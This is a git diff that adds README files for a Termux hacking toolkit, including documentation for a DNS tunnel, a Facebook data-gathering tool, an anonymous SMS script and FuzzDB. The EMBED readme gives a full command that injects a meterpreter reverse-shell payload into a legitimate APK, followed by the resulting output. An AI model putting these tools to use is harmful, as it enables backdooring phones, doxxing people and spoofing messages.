+- Warnings and Disclaimers: + * Flooding third-party hosts or networks is commonly considered a criminal activity. + * Flooding your own hosts or networks is usually a bad idea + * Higher-performace flooding solutions should be used for stress/performance tests + * Use primarily in lab environments for QoS tests. + +To get help join to : https://t.me/Ivam3_Bot + +# Coded by Ivam3 diff --git a/.deb/home/.local/etc/i-Haklab/Tools/Readme/D/d-tect.md b/.deb/home/.local/etc/i-Haklab/Tools/Readme/D/d-tect.md new file mode 100755 index 00000000..453a73b2 --- /dev/null +++ b/.deb/home/.local/etc/i-Haklab/Tools/Readme/D/d-tect.md @@ -0,0 +1,37 @@ +# D-TECT +D-TECT - Pentest the Modern Web + +Author: [Shawar Khan] (https://shawarkhan.com/about/) + +Disclaimer: I am not responsible for any damage done using this tool. This tool should only be used for educational purposes and for penetration testing. + +###Compatibility: +* Any platform using Python 2.7 + +###Requirements: +* Python 2.7 +* Modules(included): Colorama, BeautifulSoup + +###Description: +**D-TECT** is an All-In-One Tool for Penetration Testing. This is specially programmed for Penetration Testers and Security Researchers to make their job easier, instead of launching different tools for performing different task. **D-TECT** provides multiple features and detection features which gather target information and finds different flaws in it. + +###Features: +* Sub-domain Scanning +* Port Scanning +* Wordpress Scanning +* Wordpress Username Enumeration +* Wordpress Backup Grabbing +* Sensitive File Detection +* Same-Site Scripting Scanning +* Click Jacking Detection +* Powerful XSS vulnerability scanning +* SQL Injection vulnerability scanning +* User-Friendly UI + +###Usage: +python d-tect.py + +# Special Thanks To: +* Curt Smith +* Tayyab Qadir +* Mugees Ahmad diff --git a/.deb/home/.local/etc/i-Haklab/Tools/Readme/D/dex2jar.md b/.deb/home/.local/etc/i-Haklab/Tools/Readme/D/dex2jar.md new file mode 100755 index 00000000..f83fabb0 --- /dev/null +++ b/.deb/home/.local/etc/i-Haklab/Tools/Readme/D/dex2jar.md @@ -0,0 +1,33 @@ +# dex2jar + +**Project move to [GitHub](https://github.com/pxb1988/dex2jar)** + +Tools to work with android .dex and java .class files + +1. dex-reader/writer: + Read/write the Dalvik Executable (.dex) file. It has a [light weight API similar with ASM](https://sourceforge.net/p/dex2jar/wiki/Faq#markdown-header-want-to-read-dex-file-using-dex2jar). +2. d2j-dex2jar: + Convert .dex file to .class files (zipped as jar) +3. smali/baksmali: + disassemble dex to smali files and assemble dex from smali files. different implementation to [smali/baksmali](http://code.google.com/p/smali), same syntax, but we support escape in type desc "Lcom/dex2jar\t\u1234;" +4. other tools: + [d2j-decrypt-string](https://sourceforge.net/p/dex2jar/wiki/DecryptStrings) + +## Usage + +1. In the root directory run: ./gradlew distZip +2. cd dex-tools/build/distributions +3. Unzip the file dex-tools-2.1-SNAPSHOT.zip (file size should be ~5 MB) +4. Run d2j-dex2jar.sh from the unzipped directory + +### Example usage: +> sh d2j-dex2jar.sh -f ~/path/to/apk_to_decompile.apk + +And the output file will be `apk_to_decompile-dex2jar.jar`. + +## Need help ? +post on issue trackers list above. + +## License +[Apache 2.0](http://www.apache.org/licenses/LICENSE-2.0.html) + diff --git a/.deb/home/.local/etc/i-Haklab/Tools/Readme/D/dns2tcp.md b/.deb/home/.local/etc/i-Haklab/Tools/Readme/D/dns2tcp.md new file mode 100755 index 00000000..1a4ed88c --- /dev/null +++ b/.deb/home/.local/etc/i-Haklab/Tools/Readme/D/dns2tcp.md @@ -0,0 +1,131 @@ +Tool Documentation +=============================================================================== +*** Packages & Binaries *** + * dns2tcp + o dns2tcpc + o dns2tcpd +=============================================================================== +****** Tool Documentation: ****** +***** dns2tcpd Usage Example ***** +:~$ cat >>.dns2tcpdrc <>.dns2tcprc < : domain to use (mandatory) + -d <1|2|3> : debug_level (1, 2 or 3) + -r : resource to access + -k : pre-shared key + -f : configuration file + -l : local port to bind, '-' is for stdin (mandatory if resource +defined without program ) + -e : program to execute + -t : max DNS server's answer delay in seconds (default is 3) + -T : DNS request type (default is TXT) + server : DNS server to use + If no resources are specified, available resources will be printed +=============================================================================== + +** dns2tcpd ** +A tunneling tool that encapsulate TCP traffic over DNS. +:~$ dns2tcpd --help +dns2tcpd: invalid option -- '-' +Usage : dns2tcpd [ -i IP ] [ -F ] [ -d debug_level ] [ -f config-file ] [ - +p pidfile ] + -F : dns2tcpd will run in foreground +=============================================================================== +Updated on: 2022-Aug-05 +=============================================================================== diff --git a/.deb/home/.local/etc/i-Haklab/Tools/Readme/E/embed.md b/.deb/home/.local/etc/i-Haklab/Tools/Readme/E/embed.md new file mode 100755 index 00000000..6d21a073 --- /dev/null +++ b/.deb/home/.local/etc/i-Haklab/Tools/Readme/E/embed.md @@ -0,0 +1,81 @@ +# EMBED v.2.0 +This tool creates a payload with metasploit framework and injected into a legitimate APK. + + DISCLAIMER +If the law is violated with it's use, this would be the responsibility of the user who handled it.. +Ivam3 is not responsible for the misuse that can be given to everything that this laboratory entails + +# REQUIREMENTS. +- Metasploit +- Java +- Keytool +- Apktool +- Jarsigner +- Apksigner +- Aapt + +# INSTALLATION. +Clone this repositorie: + + $ apt install git -y + $ git clone https://github.com/ivam3/embed.git + +Give execute permissions to the configuration file setup: + + $ chmod +x setup + +Now run the setup file: + + $ bash setup + +This file will install and configure Termux with all the required libraries and dependencies including java for termux. + +# JAVA FOR TERMUX. +For more information about java join to: + + https://github.com/ivam3/java + +This software and related documentation are provided under license agreement containing in www.java.com. Please refer to http://java.com/licensereadme. + +# USAGE + + root@user# ruby EMBED.rb PATH/to/legitim.apk -p android/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=4546 + + ._____ __ __ ____ _____ ____ + | ____| \/ | __ )| ____| _ \ + | _| |TERMUX| _ \| _| | | | | + | |___| |\/| | |_) | |___| |_| | + |_____|_| |_|____/|_____|____/ v.2 + #:::::::: By Ivam3 ::::::::::::# + + [*]─➤ Generating msfvenom payload.. + [*]─➤ Signing payload.. + [*]─➤ Decompiling orignal APK.. + [*]─➤ Ignoring the resource decompilation.. + [*]─➤ Decompiling payload APK.. + [*]─➤ Locating onCreate() hook.. + [*]─➤ Copying payload files.. + [*]─➤ Loading original/smali/devian/tubemate/home/Main.smali and injecting payload.. + [*]─➤ Poisoning the manifest with meterpreter permissions.. + [+]─➤ Adding android.permission.SEND_SMS + [+]─➤ Adding android.permission.RECEIVE_SMS + [+]─➤ Adding android.permission.RECORD_AUDIO + [+]─➤ Adding android.permission.CALL_PHONE + [+]─➤ Adding android.permission.READ_CONTACTS + [+]─➤ Adding android.permission.WRITE_CONTACTS + [+]─➤ Adding android.permission.RECORD_AUDIO + [+]─➤ Adding android.permission.CAMERA + [+]─➤ Adding android.permission.READ_SMS + [+]─➤ Adding android.permission.RECEIVE_BOOT_COMPLETED + [+]─➤ Adding android.permission.SET_WALLPAPER + [+]─➤ Adding android.permission.READ_CALL_LOG + [+]─➤ Adding android.permission.WRITE_CALL_LOG + [*]─➤ Rebuilding /sdcard/Download/tubemate-2-4-21.apk with meterpreter injection as data/data/com_backdoored.apk.. + [*]─➤ Signing data/data/com_backdoored.apk .. + [*]─➤ Aligning data/data/com_backdoored.apk .. + [+]─➤ Infected file legitim.apk_final ready. + + +This tool was written by Ivam3, +Some maintenance releases have been done by + diff --git a/.deb/home/.local/etc/i-Haklab/Tools/Readme/E/evilurl.md b/.deb/home/.local/etc/i-Haklab/Tools/Readme/E/evilurl.md new file mode 100755 index 00000000..e944f2a6 --- /dev/null +++ b/.deb/home/.local/etc/i-Haklab/Tools/Readme/E/evilurl.md @@ -0,0 +1,69 @@ +##### OTHER CONTRIBUTORS + +###### - **deantonious** [ Added cli version #4 ] + +### PREREQUISITES + +* python 3.x + +### TESTED ON +* **Kali Linux - Rolling Edition** + +* **Linux Mint - 18.3 Sylvia** + +* **Ubuntu - 16.04.3 LTS** + +### CLONE +``` +git clone https://github.com/UndeadSec/EvilURL.git +``` + +### RUNNING +``` +cd EvilURL +``` +**Interface** + +``` +python3 evilurl.py +``` + +**Command line** +``` +python3 evilurl-cli.py +``` + +## DISCLAIMER +

+ TO BE USED FOR EDUCATIONAL PURPOSES ONLY +

+ +The use of the EvilURL is COMPLETE RESPONSIBILITY of the END-USER. Developer assume NO liability and are NOT responsible for any misuse or damage caused by this program. + +"DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE +FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL +DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER +CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, +OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE +OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE." +Taken from [LICENSE](LICENSE). + +### SCREENSHOT +![Shot](https://github.com/UndeadSec/EvilURL/blob/master/Images/sc.png) + +### CHANGELOG +* **Full script updated to Python 3.x** + + { Python 2.x support closed } + +* **CheckURL Module.** + + { Now you can check if an url is evil. + + Now you can check connection from an evil url. } + +* **Better interactivity.** + + { Better interface and design. } + diff --git a/.deb/home/.local/etc/i-Haklab/Tools/Readme/E/exiF.md b/.deb/home/.local/etc/i-Haklab/Tools/Readme/E/exiF.md new file mode 100755 index 00000000..554585c4 --- /dev/null +++ b/.deb/home/.local/etc/i-Haklab/Tools/Readme/E/exiF.md @@ -0,0 +1,10 @@ +# Exif (Extract Information) +Coded by @Ivam3 + +- This framework extract information (meta data) from pictures. +- Those pictures have to be get from native come from, cuz if it was download form any website or social network the meta data could be deleted from administrator of those webs sites. + +To get help come to .... + https://www.youtube.com/c/1vam3bycinderella + https://t.me/Ivam3byCinderella + https://t.me/Ivam3_Bot diff --git a/.deb/home/.local/etc/i-Haklab/Tools/Readme/E/exploitdb.md b/.deb/home/.local/etc/i-Haklab/Tools/Readme/E/exploitdb.md new file mode 100755 index 00000000..e69de29b diff --git a/.deb/home/.local/etc/i-Haklab/Tools/Readme/F/fake-sms.md b/.deb/home/.local/etc/i-Haklab/Tools/Readme/F/fake-sms.md new file mode 100755 index 00000000..b9fa4b88 --- /dev/null +++ b/.deb/home/.local/etc/i-Haklab/Tools/Readme/F/fake-sms.md @@ -0,0 +1,44 @@ +A Simple Script to send SMS anonymously. + +# Installation: + 1. For Linux Users: + a) git clone https://github.com/machine1337/fake-sms + b) cd fake-sms then chmod +x run.sh + + 2. For Termux Users: + a) pkg update && pkg upgrade + b) pkg install git + c) git clone https://github.com/machine1337/fake-sms + d) cd fake-sms then chmod +x run.sh + +# Usage: + Just Type: bash run.sh + +# Features: + 1. SMS ANONYMOUSLY + 2. SUPER FAST SMS SENDING + 3. INTERNATIONAL SMS SENDING AVAILABLE. + 4. YOU CAN SEND ONLY ONE SMS PER DAY. + 5. NO CHARGES ON SENDING SMS. + 6. VERY EASY TO USE. + +# Note: + Use this script only for Educational Purpose. + *) If u get the error like Your number was not provided in the E.164 format so wait for sometime..... + the error is on the server side and will fix soon:) + + # This Tool Tested On: + 1. Parrot OS + 2. Kali Linux + 3. android ( Termux ) + +# video: +https://www.youtube.com/channel/UCC_aPnmV_zGfdwktCFE9cPQ + +# Credit: + If You Like This Tool then Kindly Give us a star. Thanks..... + +# Author: + a. https://www.facebook.com/pakhack01 + + b. https://instagram.com/invisibleclay100 diff --git a/.deb/home/.local/etc/i-Haklab/Tools/Readme/F/fbbrute.md b/.deb/home/.local/etc/i-Haklab/Tools/Readme/F/fbbrute.md new file mode 100755 index 00000000..28356a71 --- /dev/null +++ b/.deb/home/.local/etc/i-Haklab/Tools/Readme/F/fbbrute.md @@ -0,0 +1 @@ +# fbbrute \ No newline at end of file diff --git a/.deb/home/.local/etc/i-Haklab/Tools/Readme/F/fbi.md b/.deb/home/.local/etc/i-Haklab/Tools/Readme/F/fbi.md new file mode 100755 index 00000000..17fe5a60 --- /dev/null +++ b/.deb/home/.local/etc/i-Haklab/Tools/Readme/F/fbi.md @@ -0,0 +1,43 @@ +``` + ________. .__ + _/ ____\_ |__ |__| + \ __\ | __ \| | + | | | \_\ \ | + |__| |___ /__| + \/ + + FBI + [Facebook Informations] +``` +FBI is an accurate facebook account information gathering, all sensitive information can be easily gathered even though the target converts all of its privacy to (only me), Sensitive information about residence, date of birth, occupation, phone number and email address. + + + +# [ Installation ] +``` +$ apt update && apt upgrade +$ apt install git python2 +$ git clone https://github.com/xHak9x/fbi.git +$ cd fbi +``` + +# [ Setup ] +``` +$ pip2 install -r requirements.txt +``` +# [ Running ] +``` +$ python2 fbi.py +``` +# [ Screenshot ] + + +* if you are confused how to use it, please type 'help' to display the help menu +* [Warn] please turn off your VPN before using this program !!! +* [Tips] do not overuse this program !!! + +![](https://image.ibb.co/i4ES3U/bc.png) + + ![](https://image.ibb.co/iniWV9/electrum_3_2_2_2018_08_30_21_49_44.png) + +Bitcoin: 1A3a1p22EHXWq7muYZc9rGTmRGaithMnjR diff --git a/.deb/home/.local/etc/i-Haklab/Tools/Readme/F/ffmpeg.md b/.deb/home/.local/etc/i-Haklab/Tools/Readme/F/ffmpeg.md new file mode 100755 index 00000000..a3ae2b9b --- /dev/null +++ b/.deb/home/.local/etc/i-Haklab/Tools/Readme/F/ffmpeg.md @@ -0,0 +1,126 @@ +In this FFmpeg tutorial, we learn to change the resolution of a video (or +resize/scale a video) using FFmpeg’s commandline tool. + +Changing a video’s resolution (also known as resizing or scaling) is a very +common operation in video editing, processing, and compression. This is +particularly true for ABR video streaming where a single video is taken as the +source and compressed to several different bitrate-resolution combinations. For +example, the input video’s resolution could be 1920x1080 and ABR bitstreams +could be 1280x720, 640x480, etc. + +So, as the very first step, let’s find out what the input video’s resolution +is. Using the ffprobe tool that’s shipped with the FFmpeg builds, let’s +determine the resolution of an input video. Here’s the command line using +ffprobe. If you don’t have access to ffprobe, you can download it from +OTTVerse’s FFmpeg build page. + + $ ffprobe -v error -select_streams v:0 -show_entries stream=width,height -of csv=s=x:p=0 input.mp4 + +The output of this command should be something like this 1920x1080 displayed on +your console. That’s great – you now know the video’s resolution and can scale +or change the resolution now. +Note:You must note that the act of up/down scaling is a lossy process and will +result in some loss of video quality. + +=============================================================================== +Using FFmpeg to scale or change the resolution of a video is done by the scale +filter in FFmpeg. To use the scale filter, use the following command – + + $ ffmpeg -i input.mp4 -vf scale=$w:$h output.mp4 + +where, $w and $h denote the required width and height of the destination video. +For example, you could use -vf scale=640:480 to resize your video to 480p. +That’s it! With this simple command, you can change the video’s resolution with +FFmpeg. + +And, after FFmpeg changes the resolution of the video, it will re-encode it at +that resolution. In the command line above, you can supply encoding parameters +to FFmpeg and encode the scaled video using those parameters. For example, you +could tell FFmpeg to encode it using crf=18 for pretty high-quality H.264/AVC +encoding, or choose something else! + +All good? Okay, let’s tackle the next subject which is changing a video’s +resolution but retaining/keepings it’s aspect ratio. + +=============================================================================== +***** How to Resize Video While Keeping the Quality High with FFmpeg ***** + +After resizing, you might notice that the quality of the output video is pretty +bad or not what you expected. This can be easily fixed by telling FFmpeg the +video encoding parameters that you would like to use after the resizing +process. +Here is an example – + + $ ffmpeg -i input.mp4 -vf scale=1280:720 -preset slow -crf 18 output.mp4 + +Here, you are telling FFmpeg to scale the video to 720p and then encode it +using crf=18 with libx264‘s slow preset that usually provides very good quality +due to the number of coding tools that it turns on. + +=============================================================================== +***** How to Change the Video’s Resolution but Keep the Aspect Ratio? ***** + +The aspect ratio of an image is very well defined in Wikipedia as follows: The +aspect ratio of an image is the ratio of its width to its height. It is +commonly expressed as two numbers separated by a colon, as in 16:9. For an x: +y aspect ratio, the image is x units wide and y units high. +It is very common to run into this problem while working with videos: How do I +change a video’s resolution (or scaling a video) but keeping or retaining the +video’s original aspect ratio. + +In FFmpeg, if you want to scale a video while retaining its aspect ratio, you +need to set either one of the height or width parameter and set the other +parameter to -1. That is if you set the height, then set the width to -1 and +vice-versa. + +To demonstrate, assume the following commands take a HD video (1920x1080) as +its input. And, let’s assume that we want to change its resolution. This can be +done in two ways as discussed above, so let’s try both ways. + +**** 1. Specify the Width To Retain the Aspect Ratio **** + + $ ffmpeg -i input.mp4 -vf scale=320:-1 output.mp4 + +The resulting video will have a resolution of 320x180. This is because 1920 / +320 = 6. Thus, the height is scaled to 1080 / 6 = 180 pixels. + + +**** 2. Specify the Height To Retain the Aspect Ratio **** + + $ ffmpeg -i input.mp4 -vf scale=-1:720 output.mp4 + +The resulting video will have a resolution of 1280x720. This is because 1080 / +720 = 1.5. Thus, the width is scaled to 1920 / 1.5 = 1280 pixels. + +=============================================================================== +***** Use Variables to Scale/Change Resolution of a Video in FFmpeg ***** + +We can implement the same scaling commands using variables that denote the +video parameters. The input video’s width and height are denoted by iw and ih +respectively. + +Let’s see what a command to scale the video’s width two times (2x) looks like. + + $ ffmpeg -i input.mp4 -vf scale=iw*2:ih output.mp4 + +If you want to divide either the height or width by a number, the syntax +changes a little as the scale=iw/2:ih/2 argument need to be enclosed within +double quotes. + + $ ffmpeg -i input.mp4 -vf "scale=iw/2:ih/2" output.mp4   + +=============================================================================== +***** Avoid Upscaling a Video based on the Input Video’s Dimensions ***** + +As we mentioned right at the start of the article, every up/down scaling action +will usually not produce the same level of video quality as the input video. +There is bound to be a few compression losses during the scaling process. If +the input resolution is too low, FFmpeg offers a neat trick to prevent +upscaling. + + $ ffmpeg -i input.mp4 -vf "scale='min(320,iw)':'min(240,ih)'" output.mp4 + +In the command line above, the minimum width/height to perform scaling is set +to 320 and 240 pixels respectively. This is a very simple way to guard against +poor quality scaling. + diff --git a/.deb/home/.local/etc/i-Haklab/Tools/Readme/F/fuzzdb.md b/.deb/home/.local/etc/i-Haklab/Tools/Readme/F/fuzzdb.md new file mode 100755 index 00000000..2e27f4b5 --- /dev/null +++ b/.deb/home/.local/etc/i-Haklab/Tools/Readme/F/fuzzdb.md @@ -0,0 +1,89 @@ +FuzzDB was created to increase the likelihood of finding application security vulnerabilities through dynamic application security testing. It's the first and most comprehensive open dictionary of fault injection patterns, predictable resource locations, and regex for matching server responses. + +**Attack Patterns -** +FuzzDB contains comprehensive lists of [attack payload](https://github.com/fuzzdb-project/fuzzdb/tree/master/attack) primitives for fault injection testing. +These patterns, categorized by attack and where appropriate platform type, are known to cause issues like OS command injection, directory listings, directory traversals, source exposure, file upload bypass, authentication bypass, XSS, http header crlf injections, SQL injection, NoSQL injection, and more. For example, FuzzDB catalogs 56 patterns that can potentially be interpreted as a null byte and contains lists of [commonly used methods](https://github.com/fuzzdb-project/fuzzdb/blob/master/attack/business-logic/CommonMethodNames.txt) such as "get, put, test," and name-value pairs than [trigger debug modes](https://github.com/fuzzdb-project/fuzzdb/blob/master/attack/business-logic/CommonDebugParamNames.txt).
+ +**Discovery -** +The popularity of standard software packaging distribution formats and installers resulted in resources like [logfiles and administrative directories](http://www.owasp.org/index.php/Forced_browsing) frequently being located in a small number of [predictable locations](https://github.com/fuzzdb-project/fuzzdb/tree/master/discovery/predictable-filepaths). +FuzzDB contains a comprehensive dictionary, sorted by platform type, language, and application, making brute force testing less brutish.
+https://github.com/fuzzdb-project/fuzzdb/tree/master/discovery + +**Response Analysis -** +Many interesting server responses are [predictable strings](https://github.com/fuzzdb-project/fuzzdb/tree/master/regex). +FuzzDB contains a set of regex pattern dictionaries to match against server responses. In addition to common server error messages, FuzzDB contains regex for credit cards, social security numbers, and more.
+ +**Other useful stuff -** +Webshells in different languages, common password and username lists, and some handy wordlists. + +**Documentation -** +Many directories contain a README.md file with usage notes. +A collection of [documentation](https://github.com/fuzzdb-project/fuzzdb/tree/master/docs) from around the web that is helpful for using FuzzDB to construct test cases is also included.
+ +### Usage tips for pentesting with FuzzDB ### +https://github.com/fuzzdb-project/fuzzdb/wiki/usagehints + +### How people use FuzzDB ### +FuzzDB is like an application security scanner, without the scanner. +Some ways to use FuzzDB: + * Website and application service black-box penetration testing with + * [OWASP Zap](https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project) proxy's FuzzDB Zap Extension + * Burp Proxy's [intruder](http://portswigger.net/intruder/) tool and scanner + * [PappyProxy](http://www.pappyproxy.com/), a console-based intercepting proxy + * To identify interesting service responses using grep patterns for PII, credit card numbers, error messages, and more + * Inside custom tools for testing software and application protocols + * Crafting security test cases for GUI or command line software with standard test automation tools + * Incorporating into other Open Source software or commercial products + * In training materials and documentation + * To learn about software exploitation techniques + * To improve your security testing product or service + +### How were the patterns collected? ### +Many, many hours of research and pentesting. And + * analysis of default app installs + * analysis of system and application documentation + * analysis of error messages + * researching old web exploits for repeatable attack strings + * scraping scanner payloads from http logs + * various books, articles, blog posts, mailing list threads + * other open source fuzzers and pentest tools +and the input of contributors: https://github.com/fuzzdb-project/fuzzdb/graphs/contributors + +### Places you can find FuzzDB ### +Other security tools and projects that incorporate FuzzzDB in whole or part + * OWASP Zap Proxy fuzzdb plugin https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project + * SecLists https://github.com/danielmiessler/SecLists + * TrustedSec Pentesters Framework https://github.com/trustedsec/ptf + * Rapid7 Metasploit https://github.com/rapid7/metasploit-framework + * Portswigger Burp Suite http://portswigger.net + * Protofuzz https://github.com/trailofbits/protofuzz + * BlackArch Linux https://www.blackarch.org/ + * ArchStrike Linux https://archstrike.org/ + +### Download ### +**Preferred method is to check out sources via git, new payloads are added frequently** + +``` +git clone https://github.com/fuzzdb-project/fuzzdb.git --depth 1 + +``` +While in the FuzzDB dir, you can update your local repo with the command +``` +git pull +``` +This Stackoverflow gives ideas on how to keep a local repository tidy: https://stackoverflow.com/questions/38171899/how-to-reduce-the-depth-of-an-existing-git-clone/46004595#46004595 + +You can also browse the [FuzzDB github sources](https://github.com/fuzzdb-project/fuzzdb/) and there is always a fresh [zip file](https://github.com/fuzzdb-project/fuzzdb/archive/master.zip) + +Note: Some antivirus/antimalware software will alert on FuzzDB. To resolve, the filepath should be whitelisted. There is nothing in FuzzDB that can harm your computer as-is, however due to the risk of local file include attacks it's not recommended to store this repository on a server or other important system. Use at your own risk. + +### Who ### +FuzzDB was created by Adam Muntner (amuntner @ gmail.com) +FuzzDB (c) Copyright Adam Muntner, 2010-2019 +Portions copyrighted by others, as noted in commit comments and README.md files. + +The FuzzDB license is New BSD and Creative Commons by Attribution. The ultimate goal of this project is to make the patterns contained within obsolete. If you use this project in your work, research, or commercial product, you are required to cite it. That's it. I always enjoy hearing about how people are using it to find an interesting bug or in a tool, send me an email and let me know. + +Submissions are always welcome! + +Official FuzzDB project page: [https://github.com/fuzzdb-project/fuzzdb/](https://github.com/fuzzdb-project/fuzzdb/) diff --git a/.deb/home/.local/etc/i-Haklab/Tools/Readme/G/gdb.md b/.deb/home/.local/etc/i-Haklab/Tools/Readme/G/gdb.md new file mode 100755 index 00000000..c68670a4 --- /dev/null +++ b/.deb/home/.local/etc/i-Haklab/Tools/Readme/G/gdb.md @@ -0,0 +1,4559 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + binutils-gdb/README at master · bminor/binutils-gdb · GitHub + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
+ Skip to content + + + + + + + + + + +
+ +
+ + + + + + + +
+ + + +
+ + + + + + + + + + +
+
+
+ + + + + + + + + + + + + + + + + + + + +
+
+ + + + + + + + +
+ + + + + Permalink + + +
+ +
+
+ + + master + + + + +
+
+
+ Switch branches/tags + +
+ + + +
+ +
+ +
+ + +
+ +
+ + + + + + + + + + + + + + + + +
+ + +
+
+
+
+ +
+ +
+ + + + Go to file + + +
+ + + + +
+
+
+ + + + +
+ +
+
+
 
+
+ +
+
 
+ Cannot retrieve contributors at this time +
+
+ + + + + + + +
+ +
+ + +
+ + 738 lines (561 sloc) + + 28.4 KB +
+ +
+ + + + + +
+ +
+ +
+
+ + + +
+ + +
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + 